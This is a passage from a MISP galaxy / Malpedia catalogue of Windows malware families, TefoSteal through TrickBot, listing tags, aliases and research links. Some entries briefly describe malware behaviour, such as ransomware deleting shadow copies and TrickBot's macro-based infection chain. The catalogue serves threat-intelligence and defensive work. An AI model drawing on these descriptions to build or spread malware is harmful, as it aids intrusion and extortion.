https://www.microsoft.com/security/blog/2020/12/28/using-microsoft-365-defender-to-coordinate-protection-against-solorigate/
https://0xc0decafe.com/malware-analyst-guide-to-pe-timestamps/
https://medium.com/mitre-attack/identifying-unc2452-related-techniques-9f7b6c7f3714
https://www.microsoft.com/security/blog/2021/03/04/goldmax-goldfinder-sibot-analyzing-nobelium-malware
https://www.accenture.com/us-en/blogs/cyber-defense/threat-intel-takeaways-solarigate

TefoSteal

The tag is: misp-galaxy:malpedia="TefoSteal"

TefoSteal is also known as:

Table 2740. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.tefosteal
https://twitter.com/WDSecurity/status/1105990738993504256

TelAndExt

According to Check Point, this is a Telegram-focused infostealer (FTP / Delphi) used to target Iranian expats and dissidents.

The tag is: misp-galaxy:malpedia="TelAndExt"

TelAndExt is also known as:

Table 2741. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.telandext
https://research.checkpoint.com/2020/rampant-kitten-an-iranian-espionage-campaign/

TelB

According to Check Point, this is a Telegram-focused infostealer (SOAP / Delphi) used to target Iranian expats and dissidents.

The tag is: misp-galaxy:malpedia="TelB"

TelB is also known as:

Table 2742. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.telb
https://research.checkpoint.com/2020/rampant-kitten-an-iranian-espionage-campaign/

TeleBot

The tag is: misp-galaxy:malpedia="TeleBot"

TeleBot is also known as:

Table 2743. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.telebot
https://www.secureworks.com/research/threat-profiles/iron-viking
https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-old-dogs-new-tricks.pdf
http://www.welivesecurity.com/2016/12/13/rise-telebots-analyzing-disruptive-killdisk-attacks/

TeleDoor

The tag is: misp-galaxy:malpedia="TeleDoor"

TeleDoor is also known as:

Table 2744. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.teledoor
https://www.secureworks.com/research/threat-profiles/iron-viking
http://blog.talosintelligence.com/2017/07/the-medoc-connection.html
https://www.welivesecurity.com/2017/07/04/analysis-of-telebots-cunning-backdoor/

Tempedreve

The tag is: misp-galaxy:malpedia="Tempedreve"

Tempedreve is also known as:

Table 2745. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.tempedreve

TempleLoader

A downloader written in Delphi that does direct decryption and memory injection of the payloads it fetches from services like OneDrive into benign processes such as dpiscaling.exe or mobsync.exe. It was observed to download Remcos.

The tag is: misp-galaxy:malpedia="TempleLoader"

TempleLoader is also known as:

Table 2746. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.temple_loader
https://app.any.run/tasks/cd25d8c3-1944-4fa0-a4be-436dc1389fca/

Terminator RAT

The tag is: misp-galaxy:malpedia="Terminator RAT"

Terminator RAT is also known as:

Fakem RAT

Table 2747. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.terminator_rat
https://malware.lu/assets/files/articles/RAP002_APT1_Technical_backstage.1.0.pdf
http://contagiodump.blogspot.com/2012/06/rat-samples-from-syrian-targeted.html
https://www.welivesecurity.com/wp-content/uploads/2014/01/Advanced-Persistent-Threats.pdf
https://documents.trendmicro.com/assets/wp/wp-fakem-rat.pdf

Termite

The tag is: misp-galaxy:malpedia="Termite"

Termite is also known as:

Table 2748. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.termite
https://threatrecon.nshc.net/2019/03/19/sectorm04-targeting-singapore-custom-malware-analysis/
https://www.alienvault.com/blogs/labs-research/internet-of-termites

TerraPreter

The tag is: misp-galaxy:malpedia="TerraPreter"

TerraPreter is also known as:

Table 2749. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.terrapreter
https://www.welivesecurity.com/2020/07/09/more-evil-deep-look-evilnum-toolset/

TerraLoader

The tag is: misp-galaxy:malpedia="TerraLoader"

TerraLoader is also known as:

Table 2750. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.terra_loader
https://github.com/StrangerealIntel/CyberThreatIntel/blob/master/Additional%20Analysis/Terraloader/2021-03-25/Analysis.md#terraloader—congrats-you-have-a-new-fake-job-
https://quointelligence.eu/2020/07/golden-chickens-evolution-of-the-maas/
https://medium.com/walmartglobaltech/a-re-look-at-the-terraloader-dropper-dll-e5947ad6e244

TerraRecon

According to QuoINT TerraRecon is a reconnaissance tool, looking for a specific piece of hardware and software targeting retail and payment services sectors. Attributed to Golden Chickens.

The tag is: misp-galaxy:malpedia="TerraRecon"

TerraRecon is also known as:

Taurus Loader Reconnaissance Module

Table 2751. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.terra_recon
https://medium.com/@quoscient/the-chicken-keeps-laying-new-eggs-uncovering-new-gc-maas-tools-used-by-top-tier-threat-actors-531d80a6b4e9
https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf

TerraStealer

According to QuoINT, TerraStealer (also known as SONE or StealerOne) is a generic reconnaissance tool, targeting for example email clients, web browsers, and file transfer utilities. Attributed to Golden Chickens.

The tag is: misp-galaxy:malpedia="TerraStealer"

TerraStealer is also known as:

SONE
StealerOne
Taurus Loader Stealer Module

Table 2752. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.terra_stealer
https://github.com/eset/malware-ioc/tree/master/evilnum
https://quointelligence.eu/2020/07/golden-chickens-evolution-of-the-maas/
https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf
https://www.welivesecurity.com/2020/07/09/more-evil-deep-look-evilnum-toolset/
https://medium.com/@quoscient/the-chicken-keeps-laying-new-eggs-uncovering-new-gc-maas-tools-used-by-top-tier-threat-actors-531d80a6b4e9
https://twitter.com/3xp0rtblog/status/1275746149719252992

TerraTV

TerraTV is a custom DLL designed to hijack legit TeamViewer applications. It was discovered and documented by QuoINT. It has been attributed to Golden Chickens malware as a service group.

The tag is: misp-galaxy:malpedia="TerraTV"

TerraTV is also known as:

Taurus Loader TeamViewer Module

Table 2753. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.terra_tv
https://blog.minerva-labs.com/taurus-user-guided-infection
https://medium.com/@quoscient/the-chicken-keeps-laying-new-eggs-uncovering-new-gc-maas-tools-used-by-top-tier-threat-actors-531d80a6b4e9
https://www.welivesecurity.com/2020/07/09/more-evil-deep-look-evilnum-toolset/
https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf

TeslaCrypt

The tag is: misp-galaxy:malpedia="TeslaCrypt"

TeslaCrypt is also known as:

cryptesla

Table 2754. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.teslacrypt
https://blogs.cisco.com/security/talos/teslacrypt
https://securelist.com/teslacrypt-2-0-disguised-as-cryptowall/71371/
https://success.trendmicro.com/solution/1113900-emerging-threat-on-ransom-cryptesla
https://researchcenter.paloaltonetworks.com/2015/10/latest-teslacrypt-ransomware-borrows-code-from-carberp-trojan/
https://blog.malwarebytes.com/threat-analysis/2016/03/teslacrypt-spam-campaign-unpaid-issue/
https://blog.christophetd.fr/malware-analysis-lab-with-virtualbox-inetsim-and-burp/
https://blog.checkpoint.com/wp-content/uploads/2016/05/Tesla-crypt-whitepaper_V3.pdf
https://community.riskiq.com/article/30f22a00
https://www.endgame.com/blog/technical-blog/your-package-has-been-successfully-encrypted-teslacrypt-41a-and-malware-attack
https://www.trendmicro.com/en_us/research/21/b/new-in-ransomware.html
https://www.welivesecurity.com/2015/12/16/nemucod-malware-spreads-ransomware-teslacrypt-around-world/

TFlower

TFlower is a new ransomware targeting mostly corporate networks discovered in August, 2019. It is reportedly installed on networks by attackers after they gain access via RDP. TFlower displays a console showing activity being performed by the ransomware when it encrypts a machine, further indicating that this ransomware is triggered by the attacker post compromise, similar to Samsam/Samas in terms of TTP. Once encryption is started, the ransomware will conduct a status report to an apparently hard-coded C2. Shadow copies are deleted and the Windows 10 repair environment is disabled by this ransomware. This malware also will terminate any running Outlook.exe process so that the mail files can be encrypted. This ransomware does not add an extention to encrypted files, but prepends the marker "*tflower" and what may be the encrypted encryption key for the file to each affected file. Once encryption is completed, another status report is sent to the C2 server.

The tag is: misp-galaxy:malpedia="TFlower"

TFlower is also known as:

Table 2755. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.tflower
https://cyber.gc.ca/en/alerts/tflower-ransomware-campaign
https://www.bleepingcomputer.com/news/security/tflower-ransomware-the-latest-attack-targeting-businesses/
https://www.sygnia.co/mata-framework

Thanatos

The tag is: misp-galaxy:malpedia="Thanatos"

Thanatos is also known as:

Alphabot

Table 2756. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.thanatos
https://www.proofpoint.com//us/threat-insight/post/Death-Comes-Calling-Thanatos-Alphabot-Trojan-Hits-Market

Thanatos Ransomware

The tag is: misp-galaxy:malpedia="Thanatos Ransomware"

Thanatos Ransomware is also known as:

Table 2757. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.thanatos_ransom
https://blog.talosintelligence.com/2018/06/ThanatosDecryptor.html
https://www.bleepingcomputer.com/news/security/thanatos-ransomware-is-first-to-use-bitcoin-cash-messes-up-encryption/
https://www.bleepingcomputer.com/news/security/thanatos-ransomware-decryptor-released-by-the-cisco-talos-group/

ThinMon

The tag is: misp-galaxy:malpedia="ThinMon"

ThinMon is also known as:

Table 2758. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.thinmon
https://mp.weixin.qq.com/s/nyxZFXgrtm2-tBiV3-wiMg

ThreeByte

The tag is: misp-galaxy:malpedia="ThreeByte"

ThreeByte is also known as:

Table 2759. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.threebyte
https://www.fireeye.com/blog/threat-research/2014/09/darwins-favorite-apt-group-2.html

ThumbThief

The tag is: misp-galaxy:malpedia="ThumbThief"

ThumbThief is also known as:

Table 2760. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.thumbthief
http://www.welivesecurity.com/2016/03/23/new-self-protecting-usb-trojan-able-to-avoid-detection/

ThunderX

Ransomware.

The tag is: misp-galaxy:malpedia="ThunderX"

ThunderX is also known as:

Ranzy Locker

Table 2761. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.thunderx
https://labs.sentinelone.com/ranzy-ransomware-better-encryption-among-new-features-of-thunderx-derivative/
https://www.cyborgsecurity.com/cyborg_labs/hunting-ransomware-inhibiting-system-backup-or-recovery/
https://www.bleepingcomputer.com/news/security/thunderx-ransomware-rebrands-as-ranzy-locker-adds-data-leak-site/
https://docs.google.com/spreadsheets/d/1MI8Z2tBhmqQ5X8Wf_ozv3dVjz5sJOs-3
https://id-ransomware.blogspot.com/2020/08/thunderx-ransomware.html
https://public.intel471.com/blog/ransomware-as-a-service-2020-ryuk-maze-revil-egregor-doppelpaymer/

Thunker

The tag is: misp-galaxy:malpedia="Thunker"

Thunker is also known as:

Table 2762. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.thunker

Tidepool

The tag is: misp-galaxy:malpedia="Tidepool"

Tidepool is also known as:

Table 2763. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.tidepool
https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/wp-operation-ke3chang.pdf
http://researchcenter.paloaltonetworks.com/2016/05/operation-ke3chang-resurfaces-with-new-tidepool-malware/

Tiger RAT

under investigation, potentially linked to win.unidentified_082.

The tag is: misp-galaxy:malpedia="Tiger RAT"

Tiger RAT is also known as:

Table 2764. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.tiger_rat
https://www.krcert.or.kr/filedownload.do?attach_file_seq=3277&attach_file_id=EpF3277.pdf

tildeb

Standalone implant. Potentially tied to a framework called PATROLWAGON.

The tag is: misp-galaxy:malpedia="tildeb"

tildeb is also known as:

Table 2765. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.tildeb
https://documents.trendmicro.com/assets/tech-brief-tildeb-analyzing-the-18-year-old-implant-from-the-shadow-brokers-leak.pdf

Tinba

The tag is: misp-galaxy:malpedia="Tinba"

Tinba is also known as:

Illi
TinyBanker
Zusy

Table 2766. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.tinba
https://adalogics.com/blog/the-state-of-advanced-code-injections
https://blogs.blackberry.com/en/2019/03/blackberry-cylance-vs-tinba-banking-trojan
https://www.zscaler.com/blogs/research/look-recent-tinba-banking-trojan-variant
https://securityblog.switch.ch/2015/06/18/so-long-and-thanks-for-all-the-domains/
https://www.welivesecurity.com/wp-content/uploads/2020/07/ESET_Threat_Report_Q22020.pdf
https://www.f5.com/labs/articles/education/banking-trojans-a-reference-guide-to-the-malware-family-tree
http://contagiodump.blogspot.com/2012/06/amazon.html
http://www.trendmicro.com/cloud-content/us/pdfs/security-intelligence/white-papers/wp_w32-tinba-tinybanker.pdf
http://garage4hackers.com/entry.php?b=3086
http://www.theregister.co.uk/2012/06/04/small_banking_trojan/
http://securityintelligence.com/tinba-malware-reloaded-and-attacking-banks-around-the-world/
https://securityintelligence.com/tinba-trojan-sets-its-sights-on-romania/
http://stopmalvertising.com/malware-reports/mini-analysis-of-the-tinybanker-tinba.html

TinyLoader

The tag is: misp-galaxy:malpedia="TinyLoader"

TinyLoader is also known as:

Table 2767. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.tinyloader
https://www.proofpoint.com/us/threat-insight/post/AbaddonPOS-A-New-Point-Of-Sale-Threat-Linked-To-Vawtrak
https://www.forcepoint.com/sites/default/files/resources/files/report-tinypos-analysis-en.pdf
https://www.proofpoint.com/us/threat-insight/post/abaddonpos-now-targeting-specific-pos-software
https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf

TinyMet

TinyMet is a meterpreter stager.

The tag is: misp-galaxy:malpedia="TinyMet"

TinyMet is also known as:

TiniMet

Table 2768. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.tinymet
https://github.com/SherifEldeeb/TinyMet
https://www.crowdstrike.com/blog/how-falcon-complete-stopped-a-big-game-hunting-ransomware-attack/
https://www.blueliv.com/cyber-security-and-cyber-threat-intelligence-blog-blueliv/using-qiling-framework-to-unpack-ta505-packed-samples/
https://www.flashpoint-intel.com/blog/fin7-revisited:-inside-astra-panel-and-sqlrat-malware/
https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf
https://twitter.com/VK_Intel/status/1273292957429510150
https://www.secureworks.com/research/threat-profiles/gold-niagara
https://www.fsec.or.kr/common/proc/fsec/bbs/163/fileDownLoad/2297.do
https://www.telekom.com/en/blog/group/article/cybersecurity-ta505-s-box-of-chocolate-597672

TinyNuke

TinyNuke (aka Nuclear Bot) is a fully-fledged banking trojan including HiddenDesktop/VNC server and a reverse socks4 server. It was for sale on underground marketplaces for $2500 in 2016. The program’s author claimed the malware was written from scratch, but that it functioned similarly to the ZeuS banking trojan in that it could steal passwords and inject arbitrary content when victims visited banking Web sites. However, he then proceeded to destroy his own reputation on hacker forums by promoting his development too aggressively. As a displacement activity, he published his source code on Github. XBot is an off-spring of TinyNuke, but very similar to its ancestor.

The tag is: misp-galaxy:malpedia="TinyNuke"

TinyNuke is also known as:

MicroBankingTrojan
Nuclear Bot
NukeBot
Xbot

Table 2769. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.tinynuke
https://www.bitsighttech.com/blog/break-out-of-the-tinynuke-botnet
https://forums.juniper.net/t5/Threat-Research/Nukebot-Banking-Trojan-targeting-people-in-France/ba-p/326702
https://benkowlab.blogspot.de/2017/08/quick-look-at-another-alina-fork-xbot.html
https://securityintelligence.com/the-nukebot-trojan-a-bruised-ego-and-a-surprising-source-code-leak/
https://securelist.com/the-nukebot-banking-trojan-from-rough-drafts-to-real-threats/78957/
https://krebsonsecurity.com/2019/12/nuclear-bot-author-arrested-in-sextortion-case/
https://www.arbornetworks.com/blog/asert/dismantling-nuclear-bot/
https://krebsonsecurity.com/tag/nuclear-bot/

TinyTyphon

The tag is: misp-galaxy:malpedia="TinyTyphon"

TinyTyphon is also known as:

Table 2770. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.tinytyphon
https://www.forcepoint.com/sites/default/files/resources/files/forcepoint-security-labs-monsoon-analysis-report.pdf
https://www.forcepoint.com/blog/x-labs/monsoon-analysis-apt-campaign

TinyZbot

The tag is: misp-galaxy:malpedia="TinyZbot"

TinyZbot is also known as:

Table 2771. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.tinyzbot
https://www.secureworks.com/research/threat-profiles/cobalt-gypsy
https://www.cylance.com/content/dam/cylance/pages/operation-cleaver/Cylance_Operation_Cleaver_Report.pdf

TinyTurla

Talos describes this as a malware family with very scoped functionality and thus a small code footprint, likely used as a second chance backdoor.

The tag is: misp-galaxy:malpedia="TinyTurla"

TinyTurla is also known as:

Table 2772. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.tiny_turla
https://blog.talosintelligence.com/2021/09/tinyturla.html

Tiop

The tag is: misp-galaxy:malpedia="Tiop"

Tiop is also known as:

Table 2773. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.tiop

Tmanger

The tag is: misp-galaxy:malpedia="Tmanger"

Tmanger is also known as:

LuckyBack

Table 2774. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.tmanger
https://www.youtube.com/watch?v=1WfPlgtfWnQ
https://insight-jp.nttsecurity.com/post/102gi9b/pandas-new-arsenal-part-1-tmanger
https://www.welivesecurity.com/2020/12/10/luckymouse-ta428-compromise-able-desktop/
https://vblocalhost.com/uploads/VB2020-20.pdf
https://labs.sentinelone.com/thundercats-hack-the-fsb-your-taxes-didnt-pay-for-this-op/
https://insight-jp.nttsecurity.com/post/102glv5/pandas-new-arsenal-part-3-smanager
https://decoded.avast.io/luigicamastra/apt-group-targeting-governmental-agencies-in-east-asia/
https://vblocalhost.com/uploads/VB2020-Ozawa-etal.pdf

Tofsee

The tag is: misp-galaxy:malpedia="Tofsee"

Tofsee is also known as:

Gheg

Table 2775. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.tofsee
https://lokalhost.pl/txt/peering.into.spam.botnets.VirusBulletin2017.pdf
https://www.cert.pl/en/news/single/tofsee-en/
https://www.cert.pl/en/news/single/a-deeper-look-at-tofsee-modules/
https://zerophagemalware.com/2017/03/24/terror-ek-delivers-tofsee-spambot/
https://www.dragos.com/blog/investigating-the-watering-hole-linked-to-the-oldsmar-water-treatment-facility-breach/

tomiris

The tag is: misp-galaxy:malpedia="tomiris"

tomiris is also known as:

Table 2776. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.tomiris
https://securelist.com/darkhalo-after-solarwinds-the-tomiris-connection/104311/

TONEDEAF

TONEDEAF is a backdoor that communicates with Command and Control servers using HTTP or DNS. Supported commands include system information collection, file upload, file download, and arbitrary shell command execution. When executed, this variant of TONEDEAF wrote encrypted data to two temporary files – temp.txt and temp2.txt – within the same directory of its execution.

The tag is: misp-galaxy:malpedia="TONEDEAF"

TONEDEAF is also known as:

Table 2777. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.tonedeaf
https://research.checkpoint.com/2021/irans-apt34-returns-with-an-updated-arsenal/
https://www.fireeye.com/blog/threat-research/2019/07/hard-pass-declining-apt34-invite-to-join-their-professional-network.html
https://intezer.com/blog-new-iranian-campaign-tailored-to-us-companies-uses-updated-toolset/

Tonnerre

The tag is: misp-galaxy:malpedia="Tonnerre"

Tonnerre is also known as:

Table 2778. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.tonnerre
https://download.bitdefender.com/resources/files/News/CaseStudies/study/393/Bitdefender-Whitepaper-Iranian-APT-Makes-a-Comeback-with-Thunder-and-Lightning-Backdoor-and-Espionage-Combo.pdf
https://research.checkpoint.com/2021/after-lightning-comes-thunder/

Torisma

The tag is: misp-galaxy:malpedia="Torisma"

Torisma is also known as:

Table 2779. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.torisma
https://blogs.jpcert.or.jp/en/2021/01/Lazarus_malware2.html
https://global.ahnlab.com/global/upload/download/asecreport/ASEC%20REPORT_vol.102_ENG%20(4).pdf
http://blog.nsfocus.net/stumbzarus-apt-lazarus/

TorrentLocker

The tag is: misp-galaxy:malpedia="TorrentLocker"

TorrentLocker is also known as:

Teerac

Table 2780. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.torrentlocker
https://www.trendmicro.com/content/dam/trendmicro/global/en/research/21/i/ssl-tls-technical-brief/ssl-tls-technical-brief.pdf
http://www.bleepingcomputer.com/forums/t/547708/torrentlocker-ransomware-cracked-and-decrypter-has-been-made/

ToxicEye

The tag is: misp-galaxy:malpedia="ToxicEye"

ToxicEye is also known as:

Table 2781. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.toxiceye
https://blog.checkpoint.com/2021/04/22/turning-telegram-toxic-new-toxiceye-rat-is-the-latest-to-use-telegram-for-command-control/

tRat

tRat is a modular RAT written in Delphi and has appeared in campaigns in September and October of 2018.

The tag is: misp-galaxy:malpedia="tRat"

tRat is also known as:

Table 2782. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.trat
https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-009.pdf
https://www.gdatasoftware.com/blog/trat-control-via-smartphone
https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-006.pdf
https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf
https://www.proofpoint.com/us/threat-insight/post/trat-new-modular-rat-appears-multiple-email-campaigns

TreasureHunter

The tag is: misp-galaxy:malpedia="TreasureHunter"

TreasureHunter is also known as:

huntpos

Table 2783. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.treasurehunter
https://www.fireeye.com/blog/threat-research/2016/03/treasurehunt_a_cust.html
https://www.flashpoint-intel.com/blog/treasurehunter-source-code-leaked/
http://adelmas.com/blog/treasurehunter.php

TrickBot

A financial Trojan believed to be a derivative of Dyre: the bot uses very similar code, web injects, and operational tactics. Has multiple modules including VNC and Socks5 Proxy. Uses SSL for C2 communication.

Q4 2016 - Detected in wild Oct 2016 - 1st Report 2017 - Trickbot primarily uses Necurs as vehicle for installs. Jan 2018 - Use XMRIG (Monero) miner Feb 2018 - Theft Bitcoin Mar 2018 - Unfinished ransomware module Q3/4 2018 - Trickbot starts being spread through Emotet.

Infection Vector 1. Phish > Link MS Office > Macro Enabled > Downloader > Trickbot 2. Phish > Attached MS Office > Macro Enabled > Downloader > Trickbot 3. Phish > Attached MS Office > Macro enabled > Trickbot installed

The tag is: misp-galaxy:malpedia="TrickBot"

TrickBot is also known as:

TheTrick
TrickLoader
Trickster

Table 2784. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.trickbot
https://thedfirreport.com/2021/01/11/trickbot-still-alive-and-well/
https://labs.sentinelone.com/top-tier-russian-organized-cybercrime-group-unveils-fileless-stealthy-powertrick-backdoor-for-high-value-targets/
https://unit42.paloaltonetworks.com/trickbot-updates-password-grabber-module/
https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf
https://blog.morphisec.com/trickbot-delivery-method-gets-a-new-upgrade-focusing-on-windows
https://blog.trendmicro.com/trendlabs-security-intelligence/trickbot-shows-off-new-trick-password-grabber-module
https://www.prodaft.com/m/uploads/SilverFish_TLPWHITE.pdf
https://www.flashpoint-intel.com/blog/trickbot-account-checking-hybrid-attack-model/
https://www.slideshare.net/proidea_conferences/inside-cybercrime-groups-harvesting-active-directory-for-fun-and-profit-vitali-kremez
https://www.cyberbit.com/blog/endpoint-security/latest-trickbot-variant-has-new-tricks-up-its-sleeve/
https://public.intel471.com/blog/trickbot-update-november-2020-bazar-loader-microsoft/
https://www.bsi.bund.de/SharedDocs/Downloads/DE/BSI/Publikationen/Lageberichte/Lagebericht2020.pdf?blob=publicationFile&v=2[https://www.bsi.bund.de/SharedDocs/Downloads/DE/BSI/Publikationen/Lageberichte/Lagebericht2020.pdf?blob=publicationFile&v=2]
https://blogs.microsoft.com/on-the-issues/2020/10/20/trickbot-ransomware-disruption-update/
https://www.bleepingcomputer.com/news/security/trickbot-now-uses-a-windows-10-uac-bypass-to-evade-detection/
https://www.crowdstrike.com/blog/wizard-spider-adversary-update/
https://labs.vipre.com/trickbots-tricks/
https://www.blueliv.com/research/trickbot-banking-trojan-using-eflags-as-an-anti-hook-technique/
https://labs.bitdefender.com/2020/11/trickbot-is-dead-long-live-trickbot/
https://labs.sentinelone.com/enter-the-maze-demystifying-an-affiliate-involved-in-maze-snow/
https://ibm.ent.box.com/s/hs5pcayhbbhjvj8di5sqdpbbd88tsh89
https://technical.nttsecurity.com/post/102fnog/targeted-trickbot-activity-drops-powerbrace-backdoor
https://medium.com/@vishal_29486/trickbot-a-concise-treatise-d7e4cc97f737
https://www.cybereason.com/blog/cybereason-vs.-ryuk-ransomware
https://www.zscaler.com/blogs/security-research/new-trickbot-and-bazarloader-campaigns-use-multiple-delivery-vectors
https://blog.trendmicro.com/trendlabs-security-intelligence/latest-trickbot-campaign-delivered-via-highly-obfuscated-js-file/
https://thedfirreport.com/2021/08/01/bazarcall-to-conti-ransomware-via-trickbot-and-cobalt-strike/
https://www.secureworks.com/research/threat-profiles/gold-swathmore
https://twitter.com/anthomsec/status/1321865315513520128
https://www.hhs.gov/sites/default/files/bazarloader.pdf
https://www.cert.pl/en/news/single/detricking-trickbot-loader/
https://community.riskiq.com/article/298c9fc9
https://labs.sentinelone.com/building-a-custom-malware-analysis-lab-environment/
https://blog.talosintelligence.com/2020/03/trickbot-primer.html
https://www.deepinstinct.com/2019/07/12/trickbooster-trickbots-email-based-infection-module/
https://www.ringzerolabs.com/2017/07/trickbot-banking-trojan-doc00039217doc.html
https://blog.talosintelligence.com/2018/07/smoking-guns-smoke-loader-learned-new.html
https://www.welivesecurity.com/wp-content/uploads/2020/07/ESET_Threat_Report_Q22020.pdf
https://public.intel471.com/blog/trickbot-online-emotet-microsoft-cyber-command-disruption-attempts/
https://www.botconf.eu/wp-content/uploads/2016/11/2016-LT09-TrickBot-Adams.pdf
https://public.intel471.com/blog/global-trickbot-disruption-operation-shows-promise/
https://threatresearch.ext.hp.com/detecting-a-stealthy-trickbot-campaign/
https://www.secureworks.com/research/evolution-of-the-gold-evergreen-threat-group
https://www.welivesecurity.com/wp-content/uploads/2021/02/ESET_Threat_Report_Q42020.pdf
https://na.eventscloud.com/file_uploads/6568237bca6dc156e5c5557c5989e97c_CrowdStrikeFal.Con2019_ThroughEyesOfAdversary_J.Ayers.pdf
http://www.vkremez.com/2017/11/lets-learn-trickbot-socks5-backconnect.html
https://securityintelligence.com/posts/trickbot-survival-instinct-trickboot-version/
https://blog.trendmicro.com/trendlabs-security-intelligence/trickbot-adds-remote-application-credential-grabbing-capabilities-to-its-repertoire/
https://unit42.paloaltonetworks.com/wireshark-tutorial-examining-trickbot-infections/
https://hello.global.ntt/en-us/insights/blog/trickbot-variant-communicating-over-dns
https://blogs.microsoft.com/on-the-issues/2020/10/12/trickbot-ransomware-cyberthreat-us-elections/
https://www.youtube.com/watch?v=EyDiIAtdI[https://www.youtube.com/watch?v=EyDiIAtdI]
https://www.hornetsecurity.com/en/security-information/trickbot-malspam-leveraging-black-lives-matter-as-lure/
https://www.cyberbit.com/latest-trickbot-variant-has-new-tricks-up-its-sleeve/
https://www.govcert.ch/blog/37/trickbot-an-analysis-of-data-collected-from-the-botnet
https://noticeofpleadings.com/trickbot/files/Complaint%20and%20Summons/2020-10-06%20Trickbot%201%20Complaint%20with%20exs.pdf
https://www.intrinsec.com/deobfuscating-hunting-ostap/
https://blog.morphisec.com/trickbot-uses-a-new-windows-10-uac-bypass
https://www.fireeye.com/blog/threat-research/2019/01/a-nasty-trick-from-credential-theft-malware-to-business-disruption.html
https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf
https://blog.fraudwatchinternational.com/malware/trickbot-malware-works
https://www.justice.gov/opa/pr/officials-announce-international-operation-targeting-transnational-criminal-organization
https://www.proofpoint.com/us/blog/security-briefs/threat-actors-pair-tax-themed-lures-covid-19-healthcare-themes
https://f5.com/labs/articles/threat-intelligence/malware/trickbot-expands-global-targets-beyond-banks-and-payment-processors-to-crms
https://www.microsoft.com/security/blog/2020/03/05/human-operated-ransomware-attacks-a-preventable-disaster/
https://blogs.keysight.com/blogs/tech/nwvs.entry.html/2020/12/21/trickbot_a_closerl-TpQ0.html
https://www.kryptoslogic.com/blog/2021/07/trickbot-and-zeus/
https://marcoramilli.com/2021/01/09/c2-traffic-patterns-personal-notes/
https://www.microsoft.com/security/blog/2020/10/12/trickbot-disrupted/
http://www.secureworks.com/research/threat-profiles/gold-blackburn
https://blog.malwarebytes.com/threat-analysis/malware-threat-analysis/2018/11/whats-new-trickbot-deobfuscating-elements/
https://www.bleepingcomputer.com/news/security/lightbot-trickbot-s-new-reconnaissance-malware-for-high-value-targets/
https://mal-eats.net/en/2021/05/11/campo_new_attack_campaign_targeting_japan/
https://www.intel471.com/blog/Cobalt-strike-cybercriminals-trickbot-qbot-hancitor
https://www.govcert.admin.ch/blog/36/severe-ransomware-attacks-against-swiss-smes
https://us-cert.cisa.gov/ncas/alerts/aa21-076a
https://www.wilbursecurity.com/2020/03/trickbot-to-ryuk-in-two-hours/
https://www.sneakymonkey.net/2019/05/22/trickbot-analysis/
https://www.washingtonpost.com/national-security/cyber-command-trickbot-disrupt/2020/10/09/19587aae-0a32-11eb-a166-dc429b380d10_story.html
